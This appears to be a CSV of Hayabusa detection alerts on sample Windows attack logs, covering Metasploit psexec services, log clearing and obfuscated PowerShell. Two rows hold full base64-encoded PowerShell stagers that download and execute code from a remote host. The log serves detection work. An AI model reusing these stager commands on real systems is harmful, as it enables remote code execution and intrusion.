2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAUwB0AEUAbQAuAE4ARQBUAC4AUwBFAHIAdgBJAEMAZQBQAG8AaQBOAFQATQBBAE4AYQBHAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8AbgBUAGkAbgB1AEUAIAA9ACAAMAA7ACQAVwBjAD0ATgBlAHcALQBPAGIASgBlAGMAVAAgAFMAWQBTAHQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBFAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBBAEQAZQBSAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAcgBPAHgAeQAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBXAEUAQgBSAGUAcQB1AEUAUwB0AF0AOgA6AEQAZQBmAGEAdQBMAFQAVwBlAEIAUABSAG8AeAB5ADsAJABXAGMALgBQAFIATwB4AFkALgBDAFIARQBEAGUATgBUAEkAYQBMAHMAIAA9ACAAWwBTAFkAcwBUAEUAbQAuAE4AZQB0AC4AQwByAGUARABlAG4AdABJAEEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQBVAEwAVABOAGUAVAB3AG8AcgBrAEMAcgBFAEQAZQBuAFQASQBhAEwAcwA7ACQASwA9ACcAcwB5AHwAUgA0AFgAaABCAFcAbwB6AEsALgB4AC0ANgArADkAPgBJAGkAcQA3AEQAOABgAEoATABuAGwAdwBWACcAOwAkAEkAPQAwADsAWwBDAEgAYQBSAFsAXQBdACQAQgA9ACgAWwBDAGgAQQBSAFsAXQBdACgAJAB3AGMALgBEAE8AdwBuAGwAbwBhAEQAUwBUAHIASQBOAEcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAOQA4AC4AMQA0ADkAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgATwBSACQAawBbACQAaQArACsAJQAkAGsALgBMAGUAbgBnAHQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0ASgBPAEkATgAnACcAKQA= | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe68 | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x480 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 04:19:22.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 04:19:26.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 04:19:26.575 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x160 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 04:19:26.637 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x98c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 04:19:26.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc JABXAGMAPQBOAGUAdwAtAE8AQgBKAEUAQwBUACAAUwB5AFMAdABFAG0ALgBOAEUAVAAuAFcAZQBCAEMAbABJAGUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABlAGEAZABFAHIAUwAuAEEAZABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AWABZACAAPQAgAFsAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFcAZQBiAFIARQBxAHUAZQBzAHQAXQA6ADoARABFAGYAQQB1AGwAdABXAGUAYgBQAFIATwBYAHkAOwAkAHcAQwAuAFAAcgBvAFgAeQAuAEMAcgBlAGQARQBOAFQASQBBAEwAUwAgAD0AIABbAFMAWQBzAFQAZQBNAC4ATgBlAFQALgBDAFIAZQBEAGUAbgB0AGkAQQBMAEMAQQBjAGgAZQBdADoAOgBEAGUARgBBAFUAbAB0AE4AZQB0AHcAbwByAEsAQwBSAEUAZABlAG4AVABJAGEAbABTADsAJABLAD0AJwApADAAZABoAEMAeQAxAEoAOQBzADMAcQBZAEAAJQBMACEANwBwAHUAXQBUAHwAdgBWAH0AdABuAFsAQQBRAFIAJwA7ACQAaQA9ADAAOwBbAEMASABBAHIAWwBdAF0AJABCAD0AKABbAGMASABhAHIAWwBdAF0AKAAkAFcAYwAuAEQAbwB3AG4ATABvAGEARABTAHQAUgBpAG4ARwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA5ADgALgAxADQAOQA6ADgAMAA4ADIALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAGIAWABPAHIAJABLAFsAJABJACsAKwAlACQASwAuAEwARQBuAEcAdABoAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAG8AaQBOACcAJwApAA== | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x11c | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 04:19:26.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7d0 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 04:20:19.153 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc50 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx
2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,info,,New Service Installed,Name: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,info,,New Service Installed,Name: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx
2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx
2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx
2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Persis | PrivEsc,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:32:13.803 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:40:20.569 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:40:27.201 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:37.559 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:50.476 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:43:05.021 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:43:18.017 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:44:35.127 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:44:48.428 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:47:01.705 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:47:15.018 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:49:18.983 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:49:32.379 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:11:27.669 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:11:41.506 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.271 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.279 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.280 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.300 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
